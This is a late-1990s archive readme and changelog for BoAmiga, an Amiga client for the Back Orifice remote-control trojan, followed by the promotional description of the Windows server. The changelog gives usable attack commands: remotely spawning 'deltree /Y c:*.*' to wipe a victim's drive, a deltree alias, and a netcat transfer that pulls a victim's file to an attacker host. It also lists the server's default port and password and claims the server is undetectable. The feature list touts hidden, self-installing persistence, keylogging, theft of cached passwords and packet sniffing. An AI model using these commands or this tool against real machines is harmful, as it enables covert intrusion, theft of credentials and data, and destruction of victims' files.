home *** CD-ROM | disk | FTP | other *** search
/ AmigActive 6 / AACD06.ISO / AACD / Online / BoAmiga / BoAmiga.TXT < prev    next >
Text File  |  2000-01-13  |  7KB  |  161 lines

  1.  
  2. ---------------------------------------------------------------------
  3. Back Orifice Amiga Client
  4.  
  5. * History
  6.   Version 1.21.1 - First public release;
  7.   Version 1.21.2 - Internal beta;
  8.   Version 1.21.3 - Removed bug on sweep, sweeplist command;
  9.                  - Added support of name server in sweeplist file,
  10.                    Example:
  11.                    200.200.200:Server name
  12.                    300.300.300
  13.                    400.400.400:Server name 2
  14.                  - Now sweep command is faster;
  15.                  - Now don't use more wait command of amigados, internal
  16.                    sleep command is writed;
  17.   Version 1.21.4 - Fixed enforce error when close socket, sweep, ping...
  18.                  - Added bold, underline on any returns;
  19.                  - Added internal version;
  20.                  - BO now is very very most stable;
  21.   Version 1.21.5 - Added command "port" for simple set port;
  22.                  - Added line blanker before and after help commands;
  23.                  - Added profadd, profdel, profload, proflist commands;
  24.   Version 1.21.6 - Added command "macro" to execute many commands
  25.                    using a file macro, example:
  26.                    ping
  27.                    procspawn "command.com /C deltree /Y c:*.*"
  28.                    info
  29.                    status
  30.   Version 1.21.7 - Added aliasadd, aliasdel, aliaslist commands;
  31.                  - Modified API internal commands to support
  32.                    external commands, now its possible to you create
  33.                    many more commands to add on BO. It's possible
  34.                    to add all DOS, Windows commands, and macro with
  35.                    many commands in only one, example:
  36.  
  37.                    [ Exist three arguments $arg1, $arg2, $arg3 ]
  38.                    aliasadd deltree procspaw command.com /C deltree $arg1
  39.                    after added new command just write deltree c:, 
  40.  
  41.                    * see help procspawn for spawn commands in remote 
  42.                    machine.
  43.                    * See Bo.Alias example!!! * Remember to copy Bo.Alias
  44.                    to your s: dir. Copy bo.alias s:
  45.                  - Rewrite routine used in profcommands. Remove your
  46.                    profiles and add it again or edit s:bo.profile and
  47.                    change string ":" to "®" inside txt file;
  48.                    Remember "!" is a reserved caracter of BO, never use it.
  49.                  - Added new command "call", for run local commands,
  50.                    usefull inside of macros;
  51.                  - Fixed little bug on bold caracters;
  52.                  - Added new command "version";
  53.                  - Added NetCat server for use tcpsend, tcprecv;
  54.                    Example: 
  55.                      Amigados: nc -l -p 2000 > ram:file
  56.                      BOAmiga : tcpsend c:\autoexec.bat x.x.x.x:2000
  57.   Version 1.21.8 - Added "logfile" command;
  58.                  - Fixed stack bug;
  59.                  - Added support to s:bo.startup, macro commands to 
  60.                    load on startup;
  61.                  - Fixed help of AliasAdd command;
  62.   Version 1.21.9 - Fixed version information about unix source;
  63.                  - Fixed some help information commands;
  64.                  - Added new modules CDIN, CDOUT, DELTREE, MCD;
  65.                  - Added new commands on bo.alias file;
  66.                  - Some cosmetic changes;
  67.  Version 1.21.10 - Added UNSTOP command to get delay information;
  68.                  - Added BoLogFilter external command to filter BO
  69.                    keylog;
  70.                  - New server now with 55kb, new default port and pass,
  71.                    use profload amiga to configure to new server;
  72.                  - Server "Today" 10.01.2000 are indetectable;
  73.                  - Release two versions 000-(020, 030), 060-(040, 060);
  74.                  - Server now has by default
  75.                    Port: 44999
  76.                    Pass: vaporware
  77.  
  78.  
  79. Ported and Re-Writed By SuRRouND 1998-2000 (Brazil)
  80.  
  81. Porting is based on Unix v1.21 source code
  82. Required: Any Amiga
  83.           libs: socket.library
  84. ---------------------------------------------------------------------
  85.  
  86. URL  : http://www.cultdeadcow.com/
  87. Title: Worst Case Scenario
  88.  
  89. Back Orifice Windows Remote Administration Tool
  90.  
  91. Back Orifice is a remote administration system which allows a user to control
  92. a computer across a tcpip connection using a simple console or GUI
  93. application. On a local LAN or across the internet, BO gives its user more
  94. control of the remote Windows machine than the person at the keyboard of the
  95. remote machine has.
  96. BO is small, and entirely self installing. Simply executing the server on any
  97. windows machine installs the server, moving the executable into the system
  98. where it will not interfere with other running applications. To ease
  99. distribution, BO can also be attached to any other windows executable which
  100. will run normally after installing the server.
  101. Once running, BO does not show up in the task list or close-program list, and
  102. is rerun every time the computer is started. The filename that it runs as is
  103. configurable before it is installed, and it's as easy to upgrade as uploading
  104. the new version and running it.
  105.  
  106. The Back Orifice Server Contains the Following Functionality
  107. System control
  108.  
  109. Create dialog boxes with the text of your choice. Log keystrokes. Lockup or
  110. reboot the machine.
  111.  
  112. Get detailed system information, including:
  113.  
  114.    o current user
  115.    o cpu type
  116.    o windows version
  117.    o memory usage
  118.    o mounted disks
  119.      (including hard drives, cdroms, removable drives and remote network
  120.      drives) and information for those drives
  121.    o screensaver password
  122.    o passwords cached by the user
  123.      (including those for dialups, web and network access, and any other
  124.      password cached by the operating system)
  125.  
  126. File system control
  127. Copy, rename, delete, view, and search files and directories. File
  128. compression and decompression.
  129.  
  130. Process control
  131. List, kill, and spawn processes.
  132.  
  133. Registry control
  134. List, create, delete and set keys and values in the registry.
  135.  
  136. Network control
  137. View all accessible network resources, all incoming and outgoing connections,
  138. list, create and delete network connections, list all exported resources and
  139. their passwords, create and delete exports.
  140.  
  141. Multimedia control
  142. Play wav files, capture screen shots, and capture video or still frames from
  143. any video input device (like a Quickcam).
  144.  
  145. Packet redirection
  146. Redirect any incoming TCP or UDP port to any other address & port.
  147.  
  148. Application redirection
  149. Spawn most console applications (such as command.com) on any TCP port,
  150. allowing control of applications via a telnet session.
  151.  
  152. HTTP server Upload and download files on any port using a www client such as
  153. Netscape.
  154.  
  155. Integrated packet sniffer
  156. Monitor network packets, logging any plaintext passwords that pass.
  157.  
  158. Plugin interface
  159. Write your own plugins and execute the native code of your choice in BO's
  160. hidden system process.
  161.